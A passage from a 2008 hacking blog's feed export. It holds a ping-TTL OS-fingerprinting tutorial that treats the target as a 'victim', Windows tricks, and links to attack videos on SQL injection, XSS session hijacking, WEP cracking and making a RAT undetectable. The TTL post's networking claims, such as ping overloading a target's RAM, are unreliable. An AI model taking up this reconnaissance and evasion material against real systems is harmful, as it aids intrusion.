/99865070/System_Hacking.part03.rar&lt;br /&gt;http://rapidshare.com/files/99870408/System_Hacking.part02.rar&lt;br /&gt;http://rapidshare.com/files/99867492/System_Hacking.part01.rar&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8284669014901536386?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8284669014901536386/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8284669014901536386' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8284669014901536386'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8284669014901536386'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/system-hacking-tips.html' title='System hacking tips'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-9048304482673330379</id><published>2008-09-26T12:12:00.000-07:00</published><updated>2008-09-26T12:13:00.735-07:00</updated><title type='text'>Remote operating system detection</title><content type='html'>Now a days we invite the so called victim to a webpage/blog&lt;br /&gt;and with the help of a free web traker servive get all his details&lt;br /&gt;as in browser/operating system and other details&lt;br /&gt;but still i would like to share the traditional method as well&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Detecting OS (operating system) is another most important step towards hacking into a system. We can even say that after tracing the IP of the system it is the most prior thing that should be done to get the root on a system cause without having knowledge about the OS running by the target system you cannot execute any system commands on the target system and thus your mission wont be accomplished. In here I have figure out the basics of detecting OS remotely without having physical access to the system. There are various method of detecting OS like by trace routing the victim’s IP , by pinging the IP , by using telnet and also by using a terminal. But from my research I have concluded that detecting OS through ping or tracerout is the most simplest but effective way of determining the operating system running in the remote computer without having physical access to the system. Since my aim of writing articles is to make things clear for beginners and intermediate so I will explain remote os detecting through ping method which is very easy to understand even for peoples totally new to computers.. yeah yeah.. I know you call them newbies..right ?? J J J&lt;br /&gt;&lt;br /&gt;REMOTE OS DETECTION USING PING METHOD&lt;br /&gt;&lt;br /&gt;What is PING and what is its utility ?&lt;br /&gt;&lt;br /&gt;Ping is an MSDOS utility provided for windows version of DOS and for Unix and operating systems having UNIX as the core kernel. It runs in dos box in windows and directly in UNIX platform. In this manual I will give more stress on the MSDOS version of ping.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ping is an utility used for sending and receiving packets of data to a target system using its IP and thus from the outputs you can figure out many information about the target system.&lt;br /&gt;In remote os detection we are mainly concerned with the TTL values of the received data packets.&lt;br /&gt;&lt;br /&gt;Note: When you send or receive a file over the internet it is not send at once. Instead it is broken down at the source system and these broken fragments of data know as data packets are send through the internet and these data packets are gathered together by the target system according to an algorithm constructed by the source system.&lt;br /&gt;For example if I send a picture of size 400 KB to my girl friend (hey girls out there remember I don’t yet have a gf in reality) then what actually happens is that my system breaks the data into data packets, say the file of 400 KB has been broken down into 4 data packets each having a size of 100 KB and having a name. These data packets are assigned a code known as the TTL value of the data packets by my operating system. Then these data packets are gathered and the original file is formed from these data packets at the target system.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;&lt;br /&gt;C:\windows&gt;ping/?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]&lt;br /&gt;&lt;br /&gt;[-r count] [-s count] [[-j host-list] | [-k host-list]]&lt;br /&gt;&lt;br /&gt;[-w timeout] target_name&lt;br /&gt;&lt;br /&gt;Options:&lt;br /&gt;-t Ping the specified host until stopped.&lt;br /&gt;To see statistics and continue - type Control-Break;&lt;br /&gt;-a Resolve addresses to hostnames.&lt;br /&gt;-n count Number of echo requests to send.&lt;br /&gt;-l size Send buffer size.&lt;br /&gt;-f Set Don't Fragment flag in packet.&lt;br /&gt;-i TTL Time To Live.&lt;br /&gt;-v TOS Type Of Service.&lt;br /&gt;-r count Record route for count hops.&lt;br /&gt;-s count Timestamp for count hops.&lt;br /&gt;-j host-list Loose source route along host-list.&lt;br /&gt;-k host-list Strict source route along host-list.&lt;br /&gt;-w timeout Timeout in milliseconds to wait for each reply.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;there are various switches available for ping. Above I have given a list of all the switches available in the DOS version of ping. Using the –t switch you can continuously ping a target until it is crashed down. I am sure you are probably wondering how will it crash down the remote system. The answer is quite simple. If you ping the remote system continuously then what happens is that slowly the RAM of the target system is overloaded with these stack data and compels the system to restart or crashes it. You can also use the –l switch to specify the amount of data packet to be send at a time.&lt;br /&gt;&lt;br /&gt;But in this article I am not concerned with crashing down a remote system cause its not that easy as it seems to be, there are many other tricks for it and its not possible to crash down a system of present technology just by simple ping. I am concerned with the TTL values of the output that you will get after pinging a system. You can use –n switch with ping to specify the number of echo (ie data packets) to be send to the target system. The default number is 4.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;&lt;br /&gt;C:\windows&gt; ping –n 10 127.0.0.1&lt;br /&gt;&lt;br /&gt;This command will ping 127.0.0.1 with 10 packets of data and after that will give you an output.&lt;br /&gt;&lt;br /&gt;Now I think its time for a real example which I have executed on my system.&lt;br /&gt;&lt;br /&gt;C:\windows&gt;ping 127.0.0.1&lt;br /&gt;&lt;br /&gt;Pinging 127.0.0.1 with 32 bytes of data:&lt;br /&gt;&lt;br /&gt;Reply from 127.0.0.1: bytes=32 time&lt;1ms&gt;TTL=128&lt;br /&gt;Reply from 127.0.0.1: bytes=32 time&lt;1ms&gt;TTL=128&lt;br /&gt;Reply from 127.0.0.1: bytes=32 time&lt;1ms&gt;TTL=128&lt;br /&gt;Reply from 127.0.0.1: bytes=32 time&lt;1ms&gt;TTL=128&lt;br /&gt;(or check http://members.cox.net/~ndav1/self_published/TTL_values.html)&lt;br /&gt;&lt;br /&gt;Ping statistics for 127.0.0.1:&lt;br /&gt;Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),&lt;br /&gt;Approximate round trip times in milli-seconds:&lt;br /&gt;&lt;br /&gt;Minimum = 0ms, Maximum = 0ms, Average = 0ms&lt;br /&gt;&lt;br /&gt;Here I have pinged the IP 127.0.0.1 (offline ip of any system) with default ping. Here I am getting TTL value as 128. This is the thing what we need for remote os detection.&lt;br /&gt;&lt;br /&gt;What is TTL value ?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;TTL value is nothing but a simple code assigned to the out going data packets by the operating system of a computer. The TTL value assigned to the out going data packets depends on the operating system and it is the same for a particular operating system. As for example if you ping a system running windows 98 or earlier versions of windows NT with service packs (I don’t know exactly about the TTL values of recent versions of Windows NT but from my research I think it’s the same as previous versions cause the TTL value even in Windows XP is 128) you will get the TTL value as 128, thus from this TTL value you can easily say that the target system is running Microsoft Windows.&lt;br /&gt;&lt;br /&gt;TTL values of commonly used Operating Systems&lt;br /&gt;&lt;br /&gt;OS VERSION PLATFORM TTL&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Windows 9x/NT Intel 32&lt;br /&gt;Windows 9x/NT Intel 128&lt;br /&gt;Windows 2000 Intel 128&lt;br /&gt;DigitalUnix 4.0 Alpha 60&lt;br /&gt;Unisys x Mainframe 64&lt;br /&gt;Linux 2.2.x Intel 64&lt;br /&gt;FTX(UNIX) 3.3 STRATUS 64&lt;br /&gt;SCO R5 Compaq 64&lt;br /&gt;Netware 4.11 Intel 128&lt;br /&gt;AIX 4.3.x IBM/RS6000 60&lt;br /&gt;AIX 4.2.x IBM/RS6000 60&lt;br /&gt;Cisco 11.2 7507 60&lt;br /&gt;Cisco 12.0 2514 255&lt;br /&gt;IRIX 6.x SGI 60&lt;br /&gt;FreeBSD 3.x Intel 64&lt;br /&gt;OpenBSD 2.x Intel 64&lt;br /&gt;Solaris 8 Intel/Sparc 64&lt;br /&gt;Solaris 2.x Intel/Sparc 255&lt;br /&gt;&lt;br /&gt;Well these are not all. There are many more TTL values of many other operating systems. But generally most systems lies within this list.&lt;br /&gt;&lt;br /&gt;Now lets try this manual practically and find out the operating system running by the IP 202.178.64.19.&lt;br /&gt;&lt;br /&gt;C:\windows&gt;ping 202.178.64.19&lt;br /&gt;&lt;br /&gt;Pinging 202.178.64.19 with 32 bytes of data:&lt;br /&gt;&lt;br /&gt;Reply from 202.178.64.19: bytes=32 time&lt;1ms&gt;TTL=128&lt;br /&gt;Reply from 202.178.64.19: bytes=32 time&lt;1ms&gt;TTL=128&lt;br /&gt;Reply from 202.178.64.19: bytes=32 time&lt;1ms&gt;TTL=128&lt;br /&gt;Reply from 202.178.64.19: bytes=32 time&lt;1ms&gt;TTL=128&lt;br /&gt;&lt;br /&gt;Ping statistics for 202.178.64.19:&lt;br /&gt;Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),&lt;br /&gt;Approximate round trip times in milli-seconds:&lt;br /&gt;Minimum = 0ms, Maximum = 0ms, Average = 0ms&lt;br /&gt;&lt;br /&gt;Well from the output you can figure out many informations. First 4 packets of data each of 32 bytes has been send to 202.178.64.19. In response the target system has responded with data packets of TTL value as 128.&lt;br /&gt;Now we can easily say that the system 202.178.64.19 is running windows.&lt;br /&gt;&lt;br /&gt;ERROR CORRECTION IN SOME CASES&lt;br /&gt;&lt;br /&gt;There is a possibility of error in TTL values that you receive. Even though the source system send a TTL value of 128 you may receive the TTL value as 120. Well nothing to worry cause its due to the fact that routers reduce the TTL value by 1.&lt;br /&gt;Don’t worry I’ll explain and made things much clearer for you.&lt;br /&gt;&lt;br /&gt;It’s a fact that some times routers may reduce the TTL value assigned to the data packets by the source OS by 1.&lt;br /&gt;In that case you have to find out how many routers are there in between your system and the target system and then simply add the number of routers to the received TTL values and you will get the original TTL value.&lt;br /&gt;&lt;br /&gt;To find out how many routers there are in between your system and the target system just perform a normal and simple tracert to that IP.&lt;br /&gt;For more information about tracing an IP read my article ‘TRACING IP” in&lt;br /&gt;After tracing the IP using tracert tool of dos suppose you find that there are 10 routers between you and the target system then just simply add 10 to the TTL value that you have received and you will get the original TTL value.&lt;br /&gt;&lt;br /&gt;And once you get the original TTL value then its as simple as changing girl friend to find out the operating system running by the remote computer. Just match the TTL value with the above chart and you will find out the operating system info.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-9048304482673330379?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/9048304482673330379/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=9048304482673330379' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/9048304482673330379'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/9048304482673330379'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/remote-operating-system-detection.html' title='Remote operating system detection'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-6395346675836654447</id><published>2008-09-26T12:08:00.001-07:00</published><updated>2008-09-26T12:09:38.088-07:00</updated><title type='text'>How to create con folder in xp</title><content type='html'>CON is a reserve world in windows operating system.&lt;br /&gt;that's why we can not create the folder named as&lt;br /&gt;CON.&lt;br /&gt;&lt;br /&gt;But by command prompt we can do this&lt;br /&gt;&lt;br /&gt;STEP1: goto command prompt&lt;br /&gt;STEP2: type in prompt e:\&gt; "mkdir \\.\e:\con"&lt;br /&gt;STEP3: verify by typing "dir \\.\e:\con"&lt;br /&gt;STEP4: delete the file or folder "rmdir \\.\e:\con"&lt;br /&gt;&lt;br /&gt;ollowing file names in Windows are reserved because they represent devices:&lt;br /&gt;con, con.* -&gt; the console&lt;br /&gt;prn, prn.* -&gt; the default printer, as a character device&lt;br /&gt;aux, aux.* -&gt; the default serial terminal, as a character device&lt;br /&gt;lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 -&gt; the parallel ports, as character devices&lt;br /&gt;lpt1.*, lpt2.*, lpt3.*, lpt4.*, lpt5.*, lpt6.*, lpt7.*, lpt8.*, lpt9.*&lt;br /&gt;com1, com2, com3, com4, com5, com6, com7, com8, com9 -&gt; the serial ports, as character devices&lt;br /&gt;com1.*, com2.*, com3.*, com4.*, com5.*, com6.*, com7.*, com8.*, com9.*&lt;br /&gt;nul, nul.* -&gt; the NUL or "waste bit bucket" or "black hole for bits" or "/dev/null" device&lt;br /&gt;&lt;br /&gt;Such files are considered to "exist" in all directories, so if you have a filename like "c:\temp\con", you're talking about the CON device, not about a normal disk file called "con". They're not listed using the "dir" command, or using APIs.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-6395346675836654447?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/6395346675836654447/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=6395346675836654447' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/6395346675836654447'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/6395346675836654447'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/how-to-create-con-folder-in-xp.html' title='How to create con folder in xp'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-7872534425847374646</id><published>2008-09-26T12:08:00.000-07:00</published><updated>2008-09-26T12:09:34.041-07:00</updated><title type='text'>How to create con folder</title><content type='html'>CON is a reserve world in windows operating system.&lt;br /&gt;that's why we can not create the folder named as&lt;br /&gt;CON.&lt;br /&gt;&lt;br /&gt;But by command prompt we can do this&lt;br /&gt;&lt;br /&gt;STEP1: goto command prompt&lt;br /&gt;STEP2: type in prompt e:\&gt; "mkdir \\.\e:\con"&lt;br /&gt;STEP3: verify by typing "dir \\.\e:\con"&lt;br /&gt;STEP4: delete the file or folder "rmdir \\.\e:\con"&lt;br /&gt;&lt;br /&gt;ollowing file names in Windows are reserved because they represent devices:&lt;br /&gt;con, con.* -&gt; the console&lt;br /&gt;prn, prn.* -&gt; the default printer, as a character device&lt;br /&gt;aux, aux.* -&gt; the default serial terminal, as a character device&lt;br /&gt;lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 -&gt; the parallel ports, as character devices&lt;br /&gt;lpt1.*, lpt2.*, lpt3.*, lpt4.*, lpt5.*, lpt6.*, lpt7.*, lpt8.*, lpt9.*&lt;br /&gt;com1, com2, com3, com4, com5, com6, com7, com8, com9 -&gt; the serial ports, as character devices&lt;br /&gt;com1.*, com2.*, com3.*, com4.*, com5.*, com6.*, com7.*, com8.*, com9.*&lt;br /&gt;nul, nul.* -&gt; the NUL or "waste bit bucket" or "black hole for bits" or "/dev/null" device&lt;br /&gt;&lt;br /&gt;Such files are considered to "exist" in all directories, so if you have a filename like "c:\temp\con", you're talking about the CON device, not about a normal disk file called "con". They're not listed using the "dir" command, or using APIs.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-7872534425847374646?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/7872534425847374646/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=7872534425847374646' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/7872534425847374646'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/7872534425847374646'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/how-to-create-con-folder.html' title='How to create con folder'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-2608560035697925017</id><published>2008-09-23T09:11:00.001-07:00</published><updated>2008-09-23T09:11:54.510-07:00</updated><title type='text'>Hide your Particular Drive</title><content type='html'>If u r having any important docs and want to hide it temporarily, dont wory windows XP provides (not officialy ) a utility by which u can hide urs one or more drives .&lt;br /&gt;&lt;br /&gt;1. Go to Start &gt; run &gt; type "diskpart".&lt;br /&gt;a dos window will appear with following di$$$$$$ion.&lt;br /&gt;DISKPART&gt;&lt;br /&gt;&lt;br /&gt;2. then type "list volume"&lt;br /&gt;&lt;br /&gt;this will look like it&lt;br /&gt;&lt;br /&gt;Volume### Ltr Label Fs Type Size Status Info&lt;br /&gt;-------------- ---- ------ --- ----- ---- ------- -----&lt;br /&gt;&lt;br /&gt;Volume 0 F DC-ROM&lt;br /&gt;Volume 1 C NTFS Partition 7000MB Healthy&lt;br /&gt;Volume 2 D soft NTFS Partition 8000MB Healthy&lt;br /&gt;Volume 3 E ---- NTFS Partition 8000MB Healthy&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3.if u wanna hide drive E then type "select volume 3"&lt;br /&gt;&lt;br /&gt;then a message will appear in same windows { Volume 3 is the selected volume}&lt;br /&gt;&lt;br /&gt;4.now type " remove letter E"&lt;br /&gt;now a message will come { Diskpart Removed the Drive letter }&lt;br /&gt;sometime it requires the reboot the computer .&lt;br /&gt;&lt;br /&gt;Diskpart will remove the letter .Windows XP is not having capabilty to identify the unknown volume.&lt;br /&gt;&lt;br /&gt;Don't afraid ur Data will remain same .&lt;br /&gt;to Come back the Drive repeat the process . but in 4th step which is shown in this post replace " remove" to "assign"&lt;br /&gt;i mean type " assign letter E"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-2608560035697925017?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/2608560035697925017/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=2608560035697925017' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2608560035697925017'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2608560035697925017'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/hide-your-particular-drive.html' title='Hide your Particular Drive'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1710181568077518757</id><published>2008-09-23T05:57:00.001-07:00</published><updated>2008-09-23T05:58:10.470-07:00</updated><title type='text'>List of Hacking Tutorial Video Collection</title><content type='html'>1. Hacking Server&lt;br /&gt;Hacking Web Server and installing Sock&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266934/15_my_noski.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Hacking Site&lt;br /&gt;Hacking Site and getting root&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266961/16_history_vzlom.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Brutus&lt;br /&gt;Use Brutus to crack a box running telnet.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266925/17_brutus1.avi.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. Fusion&lt;br /&gt;SQL injection on PHP_Fusion Site.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266924/18_fusion.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. Wireless&lt;br /&gt;This video shows a real life wireless hack.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266930/19_lequipe.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6. Netbios&lt;br /&gt;This video shows how to exploit file sharing.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266927/20_netbios.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7. ARP Spoofing&lt;br /&gt;This video shows how to perform an ARP Spoofing attack.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266928/21_ARPSpoofing.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;8. Jpeg exploit&lt;br /&gt;This video shows you how to use the jpeg exploit&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266945/22_jpegadmin.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;9. Hacking ParaChat&lt;br /&gt;A video that shows you how to hack parachat v5.5&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266937/23_ParaChat1.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;10. E-mail&lt;br /&gt;Tracing an E-mail and finding out more about the host that sent it and its IP.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266940/24_e-mail-ip.avi.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;11. Boot from Phlak and run Chkrootkit to detect a compromise&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266907/31_chkrootkit1.swf.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;12. WiGLE, JiGLE and Google Earth: Mapping out your wardrive&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266947/45_wigle1.swf.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;13. Using VirtualDub and a cheap webcam as a camcorder&lt;br /&gt;I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266948/49_cheapcamcorder.avi.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;14. Using VMware Player to run Live CDs (Bootable ISOs)&lt;br /&gt;In this video I show how to use the free VMware Player to run Live CDs like Knoppix, Auditor or Bart's PE Builder from an ISO&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266953/52_vmwareplayerlivecd.swf.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;15. Make your own VMs with hard drive for free: VMware Player + VMX Builder&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266915/54_vmxbuilder.swf.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;16. Yahoo.com&lt;br /&gt;Vulnerabilities of the post service yahoo.com&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266926/57_yahoo.com.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;17. wwwHack&lt;br /&gt;Use of wwwhack tool on vBulletin&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266914/59_wwwhack.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;18. XSS&lt;br /&gt;Cross site scripting (XSS) in MercuryBoard&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266912/60_new_xss.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;19. John The Ripper&lt;br /&gt;Basic work with "John The Ripper"&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266919/61_jtr.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;20. PHP/SQL Injection&lt;br /&gt;Site hacked with php exploit and known SQL injection.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266910/63_php_and_sql.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;21. UBB threads 6.2.3&lt;br /&gt;UBB Forum hacked with SQL injection.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266920/64_ubb.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;22. Bitfrost Server Crypting&lt;br /&gt;This is nice video for any one learning how to add bytes to make there server undetectable.&lt;br /&gt;RAR-Password == Crypt&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266968/66_Bifrost_Server_Cryp.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;23. Microsoft.com Bugs&lt;br /&gt;Nice videos shows of old bug that was exploited on the site&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266904/67_MICROSOFT.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;24. Interview with Kevin Mitnick&lt;br /&gt;He was on fbi's most wanted list, a nitrous Hacker but now see Kevin's Interview after being freed what he has to say about his past and future.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266959/68_kevin.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;25. Unix Shell Fundamentals : VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266984/69_UnixShellFund.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;26. C++ Video tutorials&lt;br /&gt;Nice C/C++ Shockwave videos&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266939/70_C__.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;27. Tunneling Exploits via SSH&lt;br /&gt;An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266931/74_see-sec-ssh-dcom-tunneling.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;28. Cracking WEP in 10 Minutes&lt;br /&gt;A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs.&lt;br /&gt;You'll think twice about WEP after this&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266943/75_see-sec-wepcrack.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;29. A classic client side attack&lt;br /&gt;The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site - MS06-001.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266911/76_see-sec-client-side.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;30. Blind MySQL&lt;br /&gt;Demonstration of Blind MySQL Injection (bsqlbf)&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266929/77_Blind_MySQL.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;31. D-Link Wireless&lt;br /&gt;Intruders D-Link Wireless Access Point Configuration Disclosure&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266909/78_D-Link_Wireless.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;32. Mysql bftools&lt;br /&gt;Demonstration of Blind MySQL Injection (mysql_bftools)&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266923/79_mysql_bftools.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;33. PHP Remote File&lt;br /&gt;PHP Remote File Inclusion Windows Backdoor.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266941/80_PHP_Remote.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;34. vBulletin XSS&lt;br /&gt;vBulletin XSS Demonstration with Session Hijacking&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266955/81_vBulletin_XSS.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;35. wbb portal hacked by XSS&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266950/82_wbb_portal.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;36. Reverse Engineering&lt;br /&gt;Reverse Engineering with LD PRELOAD&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266965/83_reverse.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;37. SWF File Vulnerability&lt;br /&gt;Multiple 